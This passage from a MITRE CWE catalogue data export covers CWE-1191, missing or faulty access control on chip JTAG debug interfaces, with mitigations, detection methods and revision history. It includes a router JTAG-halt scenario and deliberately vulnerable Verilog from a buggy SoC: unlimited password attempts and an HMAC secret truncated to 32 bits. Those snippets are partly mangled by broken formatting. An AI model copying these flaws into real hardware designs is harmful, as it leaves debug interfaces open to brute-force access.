"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Access Control Issues",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2011-03-29",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Access Control (Authorization) Issues",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Discouraged
|
CWE-284 is extremely high-level, a Pillar. Its name, "Improper Access Control," is often misused in low-information vulnerability reports [REF-1287] or by active use of the OWASP Top Ten, such as "A01:2021-Broken Access Control". It is not useful for trend analysis.
|
Consider using descendants of CWE-284 that are more specific to the kind of access control involved, such as those involving authorization (Missing Authorization (CWE-862), Incorrect Authorization (CWE-863), Incorrect Permission Assignment for Critical Resource (CWE-732), etc.); authentication (Missing Authentication (CWE-306) or Weak Authentication (CWE-1390)); Incorrect User Management (CWE-286); Improper Restriction of Communication Channel to Intended Endpoints (CWE-923); etc.
|
[
"Frequent Misuse",
"Abstraction"
] |
[
{
"Comment": "Missing Authorization",
"CweID": "862"
},
{
"Comment": "Incorrect Authorization",
"CweID": "863"
},
{
"Comment": "Incorrect Permission Assignment for Critical Resource",
"CweID": "732"
},
{
"Comment": "Missing Authentication",
"CweID": "306"
},
{
"Comment": "Weak Authentication",
"CweID": "1390"
},
{
"Comment": "Improper Restriction of Communication Channel to Intended Endpoints",
"CweID": "923"
}
] |
[] | null | null | null | null | null | null | null | 1
|
[
[
"284"
]
] |
[
"1191",
"1220",
"1224",
"1231",
"1233",
"1242",
"1252",
"1257",
"1259",
"1260",
"1262",
"1263",
"1267",
"1268",
"1270",
"1274",
"1276",
"1280",
"1283",
"1290",
"1292",
"1294",
"1296",
"1304",
"1311",
"1312",
"1313",
"1315",
"1316",
"1317",
"1320",
"1323",
"1334",
"269",
"282",
"285",
"286",
"287",
"346",
"749",
"923"
] |
1191
|
On-Chip Debug and Test Interface With Improper Access Control
|
Base
|
Simple
|
Stable
|
The chip does not implement or does not correctly perform access control to check whether users are authorized to access internal registers and test modes through the physical debug/test interface.
|
A device's internal information may be accessed through a scan chain of interconnected internal registers, usually through a JTAG interface. The JTAG interface provides access to these registers in a serial fashion in the form of a scan chain for the purposes of debugging programs running on a device. Since almost all information contained within a device may be accessed over this interface, device manufacturers typically insert some form of authentication and authorization to prevent unintended use of this sensitive information. This mechanism is implemented in addition to on-chip protections that are already present.
If authorization, authentication, or some other form of access control is not implemented or not implemented correctly, a user may be able to bypass on-chip protection mechanisms through the debug interface.
Sometimes, designers choose not to expose the debug pins on the motherboard. Instead, they choose to hide these pins in the intermediate layers of the board. This is primarily done to work around the lack of debug authorization inside the chip. In such a scenario (without debug authorization), when the debug interface is exposed, chip internals are accessible to an attacker.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Application Data"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality"
]
},
{
"Impact": [
"Read Memory"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality"
]
},
{
"Impact": [
"Execute Unauthorized Code or Commands"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Authorization"
]
},
{
"Impact": [
"Modify Memory"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Integrity"
]
},
{
"Impact": [
"Modify Application Data"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Integrity"
]
},
{
"Impact": [
"Bypass Protection Mechanism"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "If feasible, the manufacturer should disable the JTAG interface or implement authentication and authorization for the JTAG interface. If authentication logic is added, it should be resistant to timing attacks. Security-sensitive data stored in registers, such as keys, etc. should be cleared when entering debug mode.",
"Effectiveness": "High",
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
}
] |
[
{
"Description": "chain: JTAG interface is not disabled (CWE-1191) during ROM code execution, introducing a race condition (CWE-362) to extract encryption keys",
"Link": "https://www.cve.org/CVERecord?id=CVE-2019-18827",
"Reference": "CVE-2019-18827"
}
] | null | null |
[
"1",
"180"
] |
[
{
"Authors": [
"Kurt Rosenfeld",
"Ramesh Karri"
],
"Edition": null,
"ExternalReferenceID": "REF-1037",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": "02",
"PublicationYear": "2010",
"Publisher": null,
"Section": null,
"Title": "Attacks and Defenses for JTAG",
"URL": "https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=5406671",
"URLDate": null
},
{
"Authors": [
"Gopal Vishwakarma",
"Wonjun Lee"
],
"Edition": null,
"ExternalReferenceID": "REF-1043",
"Publication": null,
"PublicationDay": "03",
"PublicationMonth": "12",
"PublicationYear": "2018",
"Publisher": null,
"Section": null,
"Title": "Exploiting JTAG and Its Mitigation in IOT: A Survey",
"URL": "https://www.mdpi.com/1999-5903/10/12/121/pdf",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Gopal Vishwakarma",
"Wonjun Lee"
],
"Edition": null,
"ExternalReferenceID": "REF-1084",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "JTAG Explained (finally!): Why \"IoT\", Software Security Engineers, and Manufacturers Should Care",
"URL": "https://www.mdpi.com/1999-5903/10/12/121/pdf",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Bob Molyneaux",
"Mark McDermott",
"Anil Sabbavarapu"
],
"Edition": null,
"ExternalReferenceID": "REF-1085",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Design for Testability & Design for Debug",
"URL": "http://users.ece.utexas.edu/~mcdermot/vlsi-2/Lecture_17.pdf",
"URLDate": null
},
{
"Authors": [
"Florian Zaruba"
],
"Edition": null,
"ExternalReferenceID": "REF-1355",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "dmi_jtag.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/71103971e8204de6a61afc17d3653292517d32bf/piton/design/chip/tile/ariane/src/riscv-dbg/src/dmi_jtag.sv#L192:L204",
"URLDate": "2023-09-18"
},
{
"Authors": [
"Florian Zaruba"
],
"Edition": null,
"ExternalReferenceID": "REF-1354",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "Fix CWE-1191 in dmi_jtag.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/58f984d492fdb0369c82ef10fcbbaa4b9850f9fb/piton/design/chip/tile/ariane/src/riscv-dbg/src/dmi_jtag.sv#L200",
"URLDate": "2023-09-18"
},
{
"Authors": [
"Florian Zaruba"
],
"Edition": null,
"ExternalReferenceID": "REF-1353",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "Fix CWE-1191 in dmi_jtag.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/58f984d492fdb0369c82ef10fcbbaa4b9850f9fb/piton/design/chip/tile/ariane/src/riscv-dbg/src/dmi_jtag.sv#L131",
"URLDate": "2023-09-18"
},
{
"Authors": [
"Florian Zaruba"
],
"Edition": null,
"ExternalReferenceID": "REF-1352",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "dmi_jtag.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/71103971e8204de6a61afc17d3653292517d32bf/piton/design/chip/tile/ariane/src/riscv-dbg/src/dmi_jtag.sv#L118:L204",
"URLDate": "2023-09-18"
},
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1364",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "dmi_jtag.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/71103971e8204de6a61afc17d3653292517d32bf/piton/design/chip/tile/ariane/src/riscv-dbg/src/dmi_jtag.sv#L82",
"URLDate": "2023-07-15"
},
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1365",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "fix cwe_1205 in dmi_jtag.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/c4f4b832218b50c406dbf9f425d3b654117c1355/piton/design/chip/tile/ariane/src/riscv-dbg/src/dmi_jtag.sv#L158",
"URLDate": "2023-07-22"
}
] |
[
{
"Note": "CWE-1191 and CWE-1244 both involve physical debug access, but the weaknesses are different. CWE-1191 is effectively about missing authorization for a debug interface, i.e. JTAG. CWE-1244 is about providing internal assets with the wrong debug access level, exposing the asset to untrusted debug agents.",
"Type": "Relationship"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2019-10-15",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.0",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, References, Relationships",
"ModificationDate": "2020-06-25",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Potential_Mitigations, Relationship_Notes, Relationships, Weakness_Ordinalities",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Related_Attack_Patterns",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, References",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "provided detection methods",
"ContributionDate": "2021-10-18",
"ContributionName": "Parbati K. Manna",
"ContributionOrganization": "Intel Corporation",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "reviewed content changes",
"ContributionDate": "2021-10-20",
"ContributionName": "Narasimha Kumar V Mangipudi",
"ContributionOrganization": "Lattice Semiconductor",
"ContributionReleaseDate": null,
"ContributionType": "Feedback",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "clarified differences between CWE-1191 and CWE-1244",
"ContributionDate": "2021-10-22",
"ContributionName": "Hareesh Khattri",
"ContributionOrganization": "Intel Corporation",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested additional detail in extended description",
"ContributionDate": "2021-10-27",
"ContributionName": "Arun Kanuparthi",
"ContributionOrganization": "Intel Corporation",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Shaza Zeitouni, Mohamadreza Rostami, Pouya Mahmoody, Ahmad-Reza Sadeghi",
"ContributionOrganization": "Technical University of Darmstadt",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Rahul Kande, Chen Chen, Jeyavijayan Rajendran",
"ContributionOrganization": "Texas A&M University",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-02-26",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Exposed Chip Debug Interface With Insufficient Access Control",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-08-20",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Exposed Chip Debug and or Test Interface With Insufficient Access Control",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2021-10-28",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Exposed Chip Debug and Test Interface With Insufficient or Missing Authorization",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] |
[
{
"Description": "\n\nAuthentication and authorization of debug and test interfaces should be part of the architecture and design review process. Withholding of private register documentation from the debug and test interface public specification (\"Security by obscurity\") should not be considered as sufficient security.\n",
"DetectionMethodID": null,
"Effectiveness": null,
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Manual Results Interpretation"
},
{
"Description": "\n\nDynamic tests should be done in the pre-silicon and post-silicon stages to verify that the debug and test interfaces are not open by default.\n",
"DetectionMethodID": null,
"Effectiveness": null,
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Manual Results Interpretation"
},
{
"Description": "Tests that fuzz Debug and Test Interfaces should ensure that no access without appropriate authentication and authorization is possible.",
"DetectionMethodID": null,
"Effectiveness": "Moderate",
"EffectivenessNotes": null,
"Method": "Fuzzing"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "A home, WiFi-router device implements a login prompt which prevents an unauthorized user from issuing any commands on the device until appropriate credentials are provided. The credentials are protected on the device and are checked for strength against attack.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "If the JTAG interface on this device is not hidden by the manufacturer, the interface may be identified using tools such as JTAGulator. If it is hidden but not disabled, it can be exposed by physically wiring to the board.\n\n\nBy issuing a \"halt\" command before the OS starts, the unauthorized user pauses the watchdog timer and prevents the router from restarting (once the watchdog timer would have expired). Having paused the router, an unauthorized user is able to execute code and inspect and modify data in the device, even extracting all of the router's firmware. This allows the user to examine the router and potentially exploit it.",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "JTAG is useful to chip and device manufacturers during design, testing, and production and is included in nearly every product. Without proper authentication and authorization, the interface may allow tampering with a product.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "In order to prevent exposing the debugging interface, manufacturers might try to obfuscate the JTAG interface or blow device internal fuses to disable the JTAG interface. Adding authentication and authorization to this interface makes use by unauthorized individuals much more difficult.",
"IntroText": null,
"Language": "Other",
"Nature": "Good",
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following example code is a snippet from the JTAG wrapper module in the RISC-V debug module of the HACK@DAC'21 Openpiton SoC [REF-1355]. To make sure that the JTAG is accessed securely, the developers have included a primary authentication mechanism based on a password.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The developers employed a Finite State Machine (FSM) to implement this authentication. When a user intends to read from or write to the JTAG module, they must input a password.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "In the subsequent state of the FSM module, the entered password undergoes Hash-based Message Authentication Code (HMAC) calculation using an internal HMAC submodule. Once the HMAC for the entered password is computed by the HMAC submodule, the FSM transitions to the next state, where it compares the computed HMAC with the expected HMAC for the password.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "If the computed HMAC matches the expected HMAC, the FSM grants the user permission to perform read or write operations on the JTAG module. [REF-1352]",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t...\n\t\tPassChkValid: begin\n\t\t\tif(hashValid) begin\n```\nif(exp_hash == pass_hash) begin** \n\t\t\t\t\n\t\t\t\t```\n```\npass_check = 1'b1;** \n\t\t\t\t **end else begin** \n\t\t\t\t```\n```\npass_check = 1'b0;** \n\t\t\t\t **end\n\t\t\t\t\t state_d = Idle;** end else begin \n\t\t\t```\n\t\t\t\tstate_d = PassChkValid;\n\t\t\t end\n\t\t end\n\t ...\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "However, in the given vulnerable part of the code, the JTAG module has not defined a limitation for several continuous wrong password attempts. This omission poses a significant security risk, allowing attackers to carry out brute-force attacks without restrictions.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "Without a limitation on wrong password attempts, an attacker can repeatedly guess different passwords until they gain unauthorized access to the JTAG module. This leads to various malicious activities, such as unauthorized read from or write to debug module interface.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "To mitigate the mentioned vulnerability, developers need to implement a restriction on the number of consecutive incorrect password attempts allowed by the JTAG module, which can achieve by incorporating a mechanism that temporarily locks the module after a certain number of failed attempts.[REF-1353][REF-1354]",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t...\n\t case (state_q) \n\t\tIdle: begin\n\t\t ... \n\t\t\telse if ( (dm::dtm_op_e'(dmi.op) == dm::DTM_PASS) && \n```\n(miss_pass_check_cnt_q != 2'b11)** )\n\t\t\t begin \n\t\t\t```\n\t\t\t\tstate_d = Write;\n\t\t\t\tpass_mode = 1'b1;\n\t\t\t end\n\t\t ...\n\t\t end\n\t\t ...\n\t\tPassChkValid: begin\n\t\t\tif(hashValid) begin\n\t\t\t\tif(exp_hash == pass_hash) begin\n\t\t\t\t\tpass_check = 1'b1;\n\t\t\t\t end else begin \n\t\t\t\t\tpass_check = 1'b0;\n```\nmiss_pass_check_cnt_d = miss_pass_check_cnt_q + 1** end\n\t\t\t\t state_d = Idle; end else begin \n\t\t\t```\n\t\t\t\tstate_d = PassChkValid;\n\t\t\t end\n\t\t end\n\t ...\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Good",
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The example code below is taken from the JTAG access control mechanism of the HACK@DAC'21 buggy OpenPiton SoC [REF-1364]. Access to JTAG allows users to access sensitive information in the system. Hence, access to JTAG is controlled using cryptographic authentication of the users. In this example (see the vulnerable code source), the password checker uses HMAC-SHA256 for authentication. It takes a 512-bit secret message from the user, hashes it using HMAC, and compares its output with the expected output to determine the authenticity of the user.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "...\n\n **logic [31-1:0] data_d,** data_q;\n ...\n\n **logic [512-1:0] pass_data;** \n ...\n\n```\n\t Write: begin\n\t\t ...\n\t\t\t if (pass_mode) begin\n```\npass_data = { {60{8'h00}}, data_d};** \n\t\t\t\t state_d = PassChk;\n\t\t\t\t pass_mode = 1'b0;\n\t\t\t\t ...\n\t\t\t end\n\t ...",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The vulnerable code shows an incorrect implementation of the HMAC authentication where it only uses the least significant 32 bits of the secret message for the authentication (the remaining 480 bits are hard coded as zeros). As a result, the system is susceptible to brute-force attacks on the access control mechanism of JTAG, where the attacker only needs to determine 32 bits of the secret message instead of 512 bits.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "To mitigate this issue, remove the zero padding and use all 512 bits of the secret message for HMAC authentication [REF-1365].",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
